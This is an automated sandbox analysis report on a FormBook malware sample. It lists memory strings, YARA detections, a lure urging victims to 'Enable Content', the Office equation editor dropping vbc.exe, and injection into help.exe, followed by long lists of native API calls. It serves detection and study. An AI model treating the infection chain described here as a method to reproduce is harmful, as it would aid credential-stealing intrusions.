Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2201932167.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000002.2393313509.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above Q 16 , 17 18 :496$ J6'KvC 19 20 21 5 ( 5690 ( 2
Source: Screenshot number: 8 Screenshot OCR: Enable Content from the yellow bar above Q 16 , 17 18 :496$ J6'KvC 19 20 21 5 ( 5690 ( 2
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D042D0 NtQueryInformationProcess, 4_2_00D042D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D042C8 NtQueryInformationProcess, 4_2_00D042C8
Source: C:\Users\Public\vbc.exe Code function: 5_2_004181B0 NtCreateFile, 5_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418260 NtReadFile, 5_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 5_2_004182E0 NtClose, 5_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418390 NtAllocateVirtualMemory, 5_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 5_2_004182AC NtReadFile, 5_2_004182AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041838B NtAllocateVirtualMemory, 5_2_0041838B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009200C4 NtCreateFile,LdrInitializeThunk, 5_2_009200C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00920048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920078 NtResumeThread,LdrInitializeThunk, 5_2_00920078
Source: C:\Users\Public\vbc.exe Code function: 5_2_009207AC NtCreateMutant,LdrInitializeThunk, 5_2_009207AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F9F0 NtClose,LdrInitializeThunk, 5_2_0091F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F900 NtReadFile,LdrInitializeThunk, 5_2_0091F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0091FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0091FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0091FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0091FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0091FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0091FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0091FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0091FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0091FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0091FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0091FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009210D0 NtOpenProcessToken, 5_2_009210D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920060 NtQuerySection, 5_2_00920060
Source: C:\Users\Public\vbc.exe Code function: 5_2_009201D4 NtSetValueKey, 5_2_009201D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092010C NtOpenDirectoryObject, 5_2_0092010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921148 NtOpenThread, 5_2_00921148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F8CC NtWaitForSingleObject, 5_2_0091F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921930 NtSetContextThread, 5_2_00921930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F938 NtWriteFile, 5_2_0091F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FAB8 NtQueryValueKey, 5_2_0091FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FA20 NtQueryInformationFile, 5_2_0091FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FA50 NtEnumerateValueKey, 5_2_0091FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FBE8 NtQueryVirtualMemory, 5_2_0091FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FB50 NtCreateKey, 5_2_0091FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC30 NtOpenProcess, 5_2_0091FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920C40 NtGetContextThread, 5_2_00920C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC48 NtSetInformationFile, 5_2_0091FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921D80 NtSuspendThread, 5_2_00921D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FD5C NtEnumerateKey, 5_2_0091FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FE24 NtWriteVirtualMemory, 5_2_0091FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FFFC NtCreateProcessEx, 5_2_0091FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FF34 NtQueueApcThread, 5_2_0091FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A00C4 NtCreateFile,LdrInitializeThunk, 7_2_007A00C4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A07AC NtCreateMutant,LdrInitializeThunk, 7_2_007A07AC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F900 NtReadFile,LdrInitializeThunk, 7_2_0079F900
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F9F0 NtClose,LdrInitializeThunk, 7_2_0079F9F0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0079FAE8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0079FAD0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0079FAB8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0079FB68
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FB50 NtCreateKey,LdrInitializeThunk, 7_2_0079FB50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0079FBB8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0079FC60
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0079FDC0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0079FD8C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0079FED0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0079FFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0078 NtResumeThread, 7_2_007A0078
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0060 NtQuerySection, 7_2_007A0060
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0048 NtProtectVirtualMemory, 7_2_007A0048
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A10D0 NtOpenProcessToken, 7_2_007A10D0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1148 NtOpenThread, 7_2_007A1148
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A010C NtOpenDirectoryObject, 7_2_007A010C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A01D4 NtSetValueKey, 7_2_007A01D4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F8CC NtWaitForSingleObject, 7_2_0079F8CC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F938 NtWriteFile, 7_2_0079F938
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1930 NtSetContextThread, 7_2_007A1930
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FA50 NtEnumerateValueKey, 7_2_0079FA50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FA20 NtQueryInformationFile, 7_2_0079FA20
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FBE8 NtQueryVirtualMemory, 7_2_0079FBE8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC48 NtSetInformationFile, 7_2_0079FC48
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0C40 NtGetContextThread, 7_2_007A0C40
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC30 NtOpenProcess, 7_2_0079FC30
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC90 NtUnmapViewOfSection, 7_2_0079FC90
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FD5C NtEnumerateKey, 7_2_0079FD5C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1D80 NtSuspendThread, 7_2_007A1D80
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FE24 NtWriteVirtualMemory, 7_2_0079FE24
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FEA0 NtReadVirtualMemory, 7_2_0079FEA0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FF34 NtQueueApcThread, 7_2_0079FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FFFC NtCreateProcessEx, 7_2_0079FFFC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001181B0 NtCreateFile, 7_2_001181B0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00118260 NtReadFile, 7_2_00118260
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001182E0 NtClose, 7_2_001182E0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00118390 NtAllocateVirtualMemory, 7_2_00118390
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001182AC NtReadFile, 7_2_001182AC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011838B NtAllocateVirtualMemory, 7_2_0011838B
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1829 4_2_001E1829
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E68B0 4_2_001E68B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E3168 4_2_001E3168
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E2250 4_2_001E2250
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EBAD8 4_2_001EBAD8
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E0470 4_2_001E0470
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E0F98 4_2_001E0F98
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6FA8 4_2_001E6FA8
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E4070 4_2_001E4070
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E3068 4_2_001E3068
Source: C:\Users\Public\vbc.exe Code function: 4_2_001ED898 4_2_001ED898
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E4080 4_2_001E4080
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E68A0 4_2_001E68A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5178 4_2_001E5178
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5188 4_2_001E5188
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E53D1 4_2_001E53D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E53E0 4_2_001E53E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1CF2 4_2_001E1CF2
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EC570 4_2_001EC570
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5618 4_2_001E5618
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5628 4_2_001E5628
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E0F0C 4_2_001E0F0C
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EB758 4_2_001EB758
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EDF48 4_2_001EDF48
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6F97 4_2_001E6F97
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022B4B0 4_2_0022B4B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00229250 4_2_00229250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00221B20 4_2_00221B20
Source: C:\Users\Public\vbc.exe Code function: 4_2_00226BF8 4_2_00226BF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022D510 4_2_0022D510
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022D9A8 4_2_0022D9A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00221260 4_2_00221260
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022CEB8 4_2_0022CEB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022D730 4_2_0022D730
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022C338 4_2_0022C338
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02880 4_2_00D02880
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D0408A 4_2_00D0408A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D04E40 4_2_00D04E40
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D06084 4_2_00D06084
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03850 4_2_00D03850
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03840 4_2_00D03840
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D00048 4_2_00D00048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D06048 4_2_00D06048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02870 4_2_00D02870
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D00012 4_2_00D00012
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D04DE0 4_2_00D04DE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03188 4_2_00D03188
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D099A9 4_2_00D099A9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03148 4_2_00D03148
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D06690 4_2_00D06690
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D0669B 4_2_00D0669B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D066A0 4_2_00D066A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D097DC 4_2_00D097DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D09380 4_2_00D09380
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02B38 4_2_00D02B38
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02B28 4_2_00D02B28
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
